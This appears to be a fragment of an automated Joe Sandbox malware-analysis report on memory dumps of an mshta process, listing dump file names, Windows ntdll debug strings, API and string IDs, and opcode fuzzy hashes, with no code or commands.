                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                                • Instruction ID: 764cebb482963a57e3baf4553fd2308e458a05d176caf75832413a9de5dff8eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B981BC70E052499BDF26FFE8C8917AEBBA1AFC5360F1C46DAD861E7391C6349840CB51
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                                                                                • Opcode ID: 69150e01eec1be0d542d5f26b01a9dcb591a08add024c342ddc0f73037791d39
                                                                                                                                                                                                                                                • Instruction ID: db2451b7fb6efa3eb570ca03198660f05e73bead64841836f35a1445211ce7cd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69150e01eec1be0d542d5f26b01a9dcb591a08add024c342ddc0f73037791d39
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D721677AA002199FDB10EFF9CC409EFB7F8EF44644F480596EA05D7200E730E9418BA5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038B02E7
                                                                                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038B02BD
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 038B031E
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                                                                                • Opcode ID: fb095f3e56f263de0a255ccb2d8655dae9c1fe2ea0af6c567c234f9d8f5150a0
                                                                                                                                                                                                                                                • Instruction ID: ddf065d11dbab4927dfa20dd64fce8f90ea985e09c83927cc4986b9c9539e311
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb095f3e56f263de0a255ccb2d8655dae9c1fe2ea0af6c567c234f9d8f5150a0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE1AD706087429FD725CFA8D884B6AB7E0BB89318F180A9DF6A5CB3D1D774D844CB52
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 038B7B7F
                                                                                                                                                                                                                                                • RTL: Resource at %p, xrefs: 038B7B8E
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 038B7BAC
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                                                                                • Opcode ID: d876b86ef706990aaec0c44293ec103858bb94ca86e9d170e63eb39e2ed03e2e
                                                                                                                                                                                                                                                • Instruction ID: 3bc4cd3b3c4753e60f1aaf1911a970da1ce8122d5f6255a0456d01747aca8328
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d876b86ef706990aaec0c44293ec103858bb94ca86e9d170e63eb39e2ed03e2e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD41E3353007469FDB25DEA8C840B6AB7E7EF89710F140A9DF95ADB380DB31E4068B91
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038B728C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 038B7294
                                                                                                                                                                                                                                                • RTL: Resource at %p, xrefs: 038B72A3
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 038B72C1
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                                                                                • Opcode ID: 6da6edb09183977e42c8e99dbd4336bfe67f2a640255f27df34f940d1eb3f1e1
                                                                                                                                                                                                                                                • Instruction ID: da4a4329f67ab53f743392e62314cd4cf6643976e6fd22d1153fb78682d34f0d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6da6edb09183977e42c8e99dbd4336bfe67f2a640255f27df34f940d1eb3f1e1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8541EF35600346ABD721DEA4CC41BAAB7B6FF84714F180699F9A6EB340DB31E942C7D1
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                                                                                • Opcode ID: d97715bf047c600f8ff42ac35654c2d7a938f00207276888d5ec3c003e85eef4
                                                                                                                                                                                                                                                • Instruction ID: 9178f16893b4e4baf2f1d5c9592d8bb3b745cc7f981a1fa7138c3b4a39d0abb6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d97715bf047c600f8ff42ac35654c2d7a938f00207276888d5ec3c003e85eef4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56317ABAA006199FDB20DF6DCC40BEEB7F8EF44610F4445D6E949E7240EB70DA458BA1
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
• Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4595111777.0000000003B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B60000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3b60000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: <!2+$=7:/$>$w{?>
                                                                                                                                                                                                                                                • API String ID: 0-2049954745
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4595111777.0000000003B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B60000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3b60000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .d(%$;,$F9p{$p{8@
                                                                                                                                                                                                                                                • API String ID: 0-1170300894